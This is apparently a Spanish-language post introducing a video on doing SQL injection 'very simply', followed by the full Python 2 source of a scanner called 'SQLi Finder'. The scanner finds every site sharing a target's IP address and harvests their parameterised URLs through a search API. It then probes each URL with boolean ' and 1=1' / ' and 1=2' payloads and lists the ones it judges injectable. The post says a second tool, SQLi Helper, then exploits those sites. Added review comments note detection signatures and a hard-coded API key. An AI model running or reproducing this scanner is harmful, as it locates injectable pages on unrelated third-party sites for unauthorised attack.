Hola, buen día. En este video muestro la manera de usar SQL injection de manera muy sencilla; en este caso uso dos herramientas para ello: una es un script, escrito por Abrahametalero, que te muestra los enlaces vulnerables a SQLi, y la otra es SQLi Helper, que es la que los explota. SQLi Helper lo uso en una máquina virtual con Windows; si alguien ya lo pudo hacer funcionar con Wine, espero que me comparta cómo.
[youtube iNufMWprFXs]
SCRIPT
# NOTE(review): the listing was collapsed onto a few physical lines by the
# page export; line breaks and indentation below are reconstructed from the
# statement order, and nothing else has been changed.
#
# Python 2 code (print statements, urllib2, urlparse). It depends on two
# third-party web endpoints (a Google AJAX web-search JSON API and a
# reverse-IP lookup page) that, as far as I know, have since been retired,
# so the script is of historical / educational interest rather than a
# working tool.
import sys
import socket
import urllib, urllib2
import re
from urlparse import urlparse
try:
    import simplejson as json
except ImportError:
    import json


class SQLF():
    """Enumerate URLs on hosts sharing the target's IP and flag those whose
    response changes under a boolean ("and 1=1" / "and 1=2") probe.

    Everything happens in ``__init__``: the constructor reads ``sys.argv[1]``,
    performs all network I/O and prints its report, so merely instantiating
    the class runs the whole scan.

    Attributes (set in ``__init__``):
      Host              -- target hostname with "http://" and "/" stripped
      IP                -- resolved address of Host
      URLS              -- candidate URLs collected from the search API
      URLS_Vulnerables  -- URLs that passed the boolean-difference check
    """

    def __init__(self):
        """Run the full pipeline: resolve host, collect URLs, filter, probe.

        Raises:
          IndexError      -- no command-line argument (guarded by __main__).
          socket.gaierror -- Host does not resolve (not caught here).
          urllib2.URLError / ValueError -- network or JSON failures from the
                             search loop are not caught either.
        """
        self.Host = sys.argv[1]
        self.IP = ""
        self.URLS = []
        self.URLS_Vulnerables = []
        if ("http://" in self.Host): # the lookup below errors unless http:// is stripped
            self.Host = self.Host.replace('http://','')
        if ("/" in self.Host): # same for any slash (note: removes every "/", not just the trailing one)
            self.Host = self.Host.replace("/","")
        self.IP = socket.gethostbyname(self.Host) # resolve the host's IP
        print "\nHost: %s" % self.Host
        print "IP: %s" % self.IP
        # ReverseDNS() returns None when the lookup finds nothing; the loop
        # below would then raise TypeError (see the note on ReverseDNS).
        Dominios = self.ReverseDNS()
        for Dominio in Dominios:
            print "[+] Checando %s" % Dominio
            Resultado = True
            Restricciones="" # always empty; reserved for extra query terms
            y = 0
            # Pre-encoded query: site:<domain> inurl:php|asp
            Query = "site:" + Dominio + "+inurl:php%7Casp%20" + Restricciones
            Buscar = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=large&start=" % Query
            # Page through results 10 at a time until the API returns no data.
            while (Resultado):
                Source = urllib2.urlopen(Buscar+str(y)) # issue the query
                Decode = json.loads(Source.read())
                Source.close() # and close the response
                if (Decode["responseData"] != None and Decode["responseData"]["results"] != []):
                    for URL in Decode["responseData"]["results"]:
                        self.URLS.append(URL["unescapedUrl"])
                    y = y + 10
                else:
                    Resultado = False
        # NOTE(review): the statements from here on are placed after the
        # domain loop in this reconstruction (the totals read as cumulative);
        # the original indentation is not recoverable from the page.
        print "[+] Obtenidas %i URLs" % len(self.URLS)
        if (len(self.URLS) == 0):
            print "[-] Maldito Google ya no quiere responder nuestras solicitudes :("
        self.tieneQuery()
        self.BorrarDuplicados()
        self.esVulnerable()
        if (len(self.URLS_Vulnerables) > 0):
            print "\n####################### URLs Posiblemente vulnerables #######################"
            for URL_vuln in self.URLS_Vulnerables:
                print "[+] %s" % URL_vuln
            print "#############################################################################"
        else:
            print "\n[-] No se ha encontrado ningun URL vulnerable..."
        print "------------ [EOF] ------------"

    def ReverseDNS(self, x=0):
        """Scrape a third-party reverse-IP page for other hostnames on Host's address.

        Only ``x == 0`` does anything: it fetches ``URL[1] + self.Host`` and
        pulls hostnames out of the page's "Whois" links with a regex.  The
        ``URL[0]`` entry (a Bing/Live search query with the literal
        placeholders IPAQUI / OFFSET1) is never substituted or requested.

        Returns:
          list of hostnames when at least one match is found; otherwise the
          function falls off the end and returns None (both the no-match
          branch and the ``x != 0`` branch).

        Defender's note: the request carries a fixed User-Agent string and
        the results are hostnames of unrelated tenants on a shared address,
        all of which are then probed by esVulnerable().
        """
        Dominios=[]
        # NOTE(review): a credential (AppId) is hard-coded in source here.
        # Treat it as exposed and rotate it if it was ever live; it should
        # come from configuration, not from the listing.
        URL=["http://api.search.live.net/json.aspx?AppId=7066FAEB6435DB963AE3CD4AC79CBED8B962779C&Query=IP:IPAQUI&Sources=web&Web.Offset=OFFSET1", "http://www.ip-adress.com/reverse_ip/"]
        # Static UA -- an easy signature for anyone reviewing the lookup
        # service's or the target's access logs.
        UserAgent = "Mozilla/5.0 (compatible; Konqueror/3.5.8; Linux)"
        Header = {"User-Agent": UserAgent}
        if (x == 0):
            Request = urllib2.Request(URL[1]+self.Host, headers=Header)
            Source = urllib2.urlopen(Request).read()
            # Hostnames are recovered from the HTML by stripping the link
            # prefix/suffix around each whois anchor.
            Founds = re.findall("href=\"/whois/\S+\">Whois]",Source)
            print "\nSitios encontrados en el mismo DNS: %i \n" % len(Founds)
            if len(Founds) >=1:
                for Found in Founds:
                    Found = Found.replace("href=\"/whois/","")
                    Found = Found.replace("\">Whois]","")
                    print "[+] %s" % Found
                    Dominios.append(Found)
                return Dominios
            else:
                print "\nNo se encontro algun resultado positivo\n"
        else:
            pass

    def BorrarDuplicados(self):
        """Drop URLs that share netloc+path, keeping the first one's query.

        Rebuilds each kept URL as ``"http://" + netloc + path + "?" + query``,
        so the original scheme is discarded and every URL becomes http.
        Membership is checked against a list (O(n^2) over the URL count).
        """
        URL_url = []
        URL_query = []
        URL_fake = []
        for URL in self.URLS:
            URL_url.append(urlparse(URL).netloc + urlparse(URL).path)
            URL_query.append(urlparse(URL).query)
        self.URLS = []
        for i in range(0, len(URL_url)):
            if (URL_url[i] not in URL_fake):
                URL_fake.append(URL_url[i])
                self.URLS.append("http://" + URL_url[i] + "?" + URL_query[i])

    def esVulnerable(self):
        """Boolean-difference probe of every URL in self.URLS.

        For each URL three requests are made: the URL as-is, the URL with
        " and 1=1" appended, and the URL with " and 1=2" appended.  A URL is
        recorded in URLS_Vulnerables when the first two bodies are identical
        and the third differs.

        Defender's note: the suffixes are appended verbatim, so the literal
        strings " and 1=1" / " and 1=2" land in the server's access logs and
        any WAF log -- a straightforward detection signature.  The
        comparison is a heuristic: pages with per-request dynamic content
        (timestamps, tokens, ads) will not compare equal and any response
        difference on the third request, whatever its cause, counts as a hit,
        so the result carries false positives and false negatives.
        """
        print
        for URL in self.URLS:
            print "[+] Checando si %s es vulnerable..." % URL
            web_Original = urllib.urlopen(URL).read()
            web_Bien = urllib.urlopen(URL + " and 1=1").read()
            web_Fail = urllib.urlopen(URL + " and 1=2").read()
            if (web_Original == web_Bien and web_Bien != web_Fail):
                print " [>]Web Vulnerable: %s" % URL
                self.URLS_Vulnerables.append(URL)

    def tieneQuery(self):
        """Keep only the URLs in self.URLS that carry a non-empty query string."""
        tmp_URLS = self.URLS
        self.URLS = []
        for URL in tmp_URLS:
            URL_Query = urlparse(URL).query
            if (URL_Query != ""):
                self.URLS.append(URL)


if __name__ == '__main__':
    # Instantiating SQLF runs the whole scan (see the class docstring).
    if (len(sys.argv) > 1):
        SQLF_ = SQLF()
    else:
        print "--------------------------------------------------------------"
        print "---- SQLi Finder by Abrahametalero ----"
        print "---- USO: %s [Target] ----" % sys.argv[0]
        print "---------------------------------------------------------[EOF]"